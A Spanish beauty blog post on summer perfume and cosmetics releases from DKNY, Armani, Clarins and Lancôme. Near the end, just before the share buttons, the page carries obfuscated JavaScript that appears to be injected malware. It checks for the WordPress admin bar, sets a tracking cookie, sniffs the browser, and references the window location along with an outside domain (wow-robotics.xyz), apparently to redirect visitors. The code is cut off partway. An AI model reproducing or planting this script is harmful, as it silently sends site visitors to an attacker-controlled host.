novedades perfumería

Ya es oficialmente verano, y por ello hoy venimos con las más refrescantes novedades para este veranito en productos de perfumería y belleza.

Donna Karan New York ha lanzado una versión de su conocido perfume DKNY 212 VIP para estas noches de verano en las que queremos darle a nuestra presencia un toque sensual y urbanita. Se trata del perfume de mujer 212 VIP Club Edition para disfrutar de las noches de verano sin fin.
En sus notas de salida radiante y refrescante: cóctel de cítricos, sorbete de grosella, suena apetecible ¿verdad?

Seguimos con sus notas de corazón con flora veraniega: jazmín, pétalos de sambac. Para acabar con notas de fondo sensual y urbana: almizcle blanco, pachuli.

 

perfume carolina herrera

 

 

 

 

 

 

 

 

 

 

 

 

En cuanto a perfumes de hombre para este verano os presentamos la refrescante versión del clásico Armani Code de Giorgio Armani.

Se trata de Armani Code  Turquoise for Men un perfume de hombre muy fresco de la familia olfativa amaderada aromática,  ideal para este verano.

¿A que huele? Pues encontrarás como notas de salida las refrescantes notas cítricas de una mezcla de pomelo y neroli, continuando con notas de olivo y cedro. Para acabar con notas de almizcle, ámbar y madera de gaiac. No te dejará indiferente.

 

perfume armani code

 

 

 

 

 

 

 

 

 

 

 

 

Seguimos con un producto revelación de Clarins se trata del suero Mission Perfection Sérum un producto que ya con su nombre nos deja entrever lo que podemos esperar de él.

Se trata de un sérum pionero dedicado a todas las mujeres anti-manchas, combate los desórdenes pigmentarios y devuelve la luminosidad a la piel, sin alterar tu tono natural. Desde la primera aplicación la tez se ve más radiante. Día tras día las manchas se atenuan, la tez recobra su frescor y luminosidad, está unificada conservando su tono natural. Clarins innova, incluyendo la acerola que actua en los exoromas bloqueando los «mensajes incorrectos» de los exosomas enviados por los queratinocitos al melanocito. Y Hexilresorcinol, actúa en el melanocito inhibiendo la tirosinasa reduciendo la producción de melanina en su origen. Toda una revelación para aquellas pieles en las que hayan aparecido manchas y queramos tratarlas. Nuestro consejo sobretodo para el verano es utilizarlo por las noches.

comprar clarins online

 

 

 

 

 

 

 

 

 

 

 

 

 

Y acabamos con un producto de maquillaje  de Lancôme que hace muchísimo más fácil el trabajo de maquillarnos los ojos. Se trata de unas sombras en textura crema en stick  Lancôme Ombre Hypnôse Stylo.

 

sombras lancome

 

 

 

 

 

 

 

 

 

 

 

 

 

Por su variedad de colores (8 tonos para elegir) y su facilidad de aplicación, además de su larga duración las hace perfectas para utilizar en verano.

Su textura cremosa y ligera se desliza y adhiere al párpado dejando un acabado uniforme y una pigmentación intensa durante todo el día.

Aplica sobre el párpado móvil como si de un boli se tratará y difumina el corte en la cuenca simplemente con la yema de un dedo.

Nunca aplicarse sombras fue tan fácil.

Y hasta aquí las novedades para este mes de Junio, esperamos que os hayan resultado interesantes y hayáis descubierto algún producto que os pueda resultar de utilidad.

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone